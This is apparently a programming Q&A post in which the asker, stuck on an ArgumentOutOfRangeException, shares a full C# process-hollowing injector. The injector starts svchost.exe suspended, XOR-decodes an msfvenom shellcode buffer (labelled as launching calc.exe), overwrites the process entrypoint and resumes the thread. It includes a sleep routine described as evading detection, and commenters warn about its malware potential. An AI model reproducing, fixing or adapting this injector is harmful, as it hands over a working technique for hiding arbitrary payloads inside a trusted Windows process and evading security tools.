# System.ArgumentOutOfRangeException: I passed this error in every single program

Tags: c#, .net, security

I'm working on process holllowing and each time I build someone program in visual studio.

I pass through the same error:

```
System.ArgumentOutOfRangeException: 'Index was out of range. Must be non-negative and less than the size of the collection.
Parameter name: startIndex'
```

```
using System;
using static Process_Hollowing.Imports.Imports;

namespace Process_Hollowing
{
    class Program
    {
        public static void sleep()
        {
            var rand = new Random();
            uint randTime = (uint)rand.Next(10000, 20000);
            double decide = randTime / 1000 - 0.5;
            DateTime now = DateTime.Now;
            Console.WriteLine("[*] Sleeping for {0} seconds to evade detections...", randTime / 1000);
            Sleep(randTime);
            if (DateTime.Now.Subtract(now).TotalSeconds < decide)
            {
                return;
            }
        }

        public static void Hollow()
        {
            PROCESS_INFORMATION proc_info = new PROCESS_INFORMATION();
            STARTUPINFO startup_info = new STARTUPINFO();
            PROCESS_BASIC_INFORMATION pbi = new PROCESS_BASIC_INFORMATION();

            string path = @"C:\\Windows\\System32\\svchost.exe";
            bool procINIT = CreateProcess(null, path, IntPtr.Zero, IntPtr.Zero, false, CreationFlags.SUSPENDED,
                IntPtr.Zero, null, ref startup_info, ref proc_info);
            if (procINIT == true)
            {
                Console.WriteLine("[*] Process create successfully.");
                Console.WriteLine("[*] Process ID: {0}", proc_info.dwProcessId);
            }
            else
            {
                Console.WriteLine("[-] Could not create the process.");
            }

            // msfvenom -p windows/x64/exec CMD=calc.exe -f csharp EXITFUNC=thread --encrypt xor --encrypt-key z
            byte[] buf = new byte[276] {
                0x86,0x32,0xf9,0x9e,0x8a,0x92,0xba,0x7a,0x7a,0x7a,0x3b,0x2b,0x3b,0x2a,0x28,
                0x2b,0x2c,0x32,0x4b,0xa8,0x1f,0x32,0xf1,0x28,0x1a,0x32,0xf1,0x28,0x62,0x32,
                0xf1,0x28,0x5a,0x32,0xf1,0x08,0x2a,0x32,0x75,0xcd,0x30,0x30,0x37,0x4b,0xb3,
                0x32,0x4b,0xba,0xd6,0x46,0x1b,0x06,0x78,0x56,0x5a,0x3b,0xbb,0xb3,0x77,0x3b,
                0x7b,0xbb,0x98,0x97,0x28,0x3b,0x2b,0x32,0xf1,0x28,0x5a,0xf1,0x38,0x46,0x32,
                0x7b,0xaa,0xf1,0xfa,0xf2,0x7a,0x7a,0x7a,0x32,0xff,0xba,0x0e,0x1d,0x32,0x7b,
                0xaa,0x2a,0xf1,0x32,0x62,0x3e,0xf1,0x3a,0x5a,0x33,0x7b,0xaa,0x99,0x2c,0x32,
                0x85,0xb3,0x3b,0xf1,0x4e,0xf2,0x32,0x7b,0xac,0x37,0x4b,0xb3,0x32,0x4b,0xba,
                0xd6,0x3b,0xbb,0xb3,0x77,0x3b,0x7b,0xbb,0x42,0x9a,0x0f,0x8b,0x36,0x79,0x36,
                0x5e,0x72,0x3f,0x43,0xab,0x0f,0xa2,0x22,0x3e,0xf1,0x3a,0x5e,0x33,0x7b,0xaa,
                0x1c,0x3b,0xf1,0x76,0x32,0x3e,0xf1,0x3a,0x66,0x33,0x7b,0xaa,0x3b,0xf1,0x7e,
                0xf2,0x32,0x7b,0xaa,0x3b,0x22,0x3b,0x22,0x24,0x23,0x20,0x3b,0x22,0x3b,0x23,
                0x3b,0x20,0x32,0xf9,0x96,0x5a,0x3b,0x28,0x85,0x9a,0x22,0x3b,0x23,0x20,0x32,
                0xf1,0x68,0x93,0x2d,0x85,0x85,0x85,0x27,0x32,0xc0,0x7b,0x7a,0x7a,0x7a,0x7a,
                0x7a,0x7a,0x7a,0x32,0xf7,0xf7,0x7b,0x7b,0x7a,0x7a,0x3b,0xc0,0x4b,0xf1,0x15,
                0xfd,0x85,0xaf,0xc1,0x9a,0x67,0x50,0x70,0x3b,0xc0,0xdc,0xef,0xc7,0xe7,0x85,
                0xaf,0x32,0xf9,0xbe,0x52,0x46,0x7c,0x06,0x70,0xfa,0x81,0x9a,0x0f,0x7f,0xc1,
                0x3d,0x69,0x08,0x15,0x10,0x7a,0x23,0x3b,0xf3,0xa0,0x85,0xaf,0x19,0x1b,0x16,
                0x19,0x54,0x1f,0x02,0x1f,0x7a };

            for (int i = 0; i < buf.Length; i++)
            {
                buf[i] = (byte)(buf[i] ^ (byte)'z');
            }

            uint retLength = 0;
            IntPtr procHandle = proc_info.hProcess;
            IntPtr threadHandle = proc_info.hThread;
            ZwQueryInformationProcess(procHandle, PROCESSBASICINFORMATION, ref pbi, (uint)(IntPtr.Size * 6), ref retLength);
            IntPtr imageBaseAddr = (IntPtr)((Int64)pbi.PebAddress + 0x10);
            Console.WriteLine("[*] Image Base Address found: 0x{0}", imageBaseAddr.ToString("x"));

            byte[] baseAddrBytes = new byte[0x8];
            IntPtr lpNumberofBytesRead = IntPtr.Zero;
            ReadProcessMemory(procHandle, imageBaseAddr, baseAddrBytes, baseAddrBytes.Length, out lpNumberofBytesRead);
            IntPtr execAddr = (IntPtr)(BitConverter.ToInt64(baseAddrBytes, 0));

            byte[] data = new byte[0x200];
            ReadProcessMemory(procHandle, execAddr, data, data.Length, out lpNumberofBytesRead);
            uint e_lfanew = BitConverter.ToUInt32(data, 0x3C);
            Console.WriteLine("[*] e_lfanew: 0x{0}", e_lfanew.ToString("X"));

            uint rvaOffset = e_lfanew + 0x28;
            uint rva = BitConverter.ToUInt32(data, (int)rvaOffset);
            IntPtr entrypointAddr = (IntPtr)((UInt64)execAddr + rva);
            Console.WriteLine("[*] Entrypoint Found: 0x{0}", entrypointAddr.ToString("X"));

            IntPtr lpNumberOfBytesWritten = IntPtr.Zero;
            WriteProcessMemory(procHandle, entrypointAddr, buf, buf.Length, ref lpNumberOfBytesWritten);
            Console.WriteLine("[*] Memory written. Resuming thread...");
            ResumeThread(threadHandle);
        }
        static void Main(string[] args)
        {
            sleep();
            Hollow();
        }
    }
}
```

Here is the code

I really tried to change everything including size and more but nothing works

Comment: to people ready this code, as always do no run unknown code, the buffer array get transformed at runtime, malware potential is pretty big here

Comment: @Fredou Don't edit comments directly into people's code.

Comment: @EtiennedeMartel this part of the code is very suspicious for malware potential, the for loop under it does manipulation of the array just above it and it get injected into the svchost of windows. I am just warning people about this, we all know not to run random code on the internet but this one raise a lot of red flag.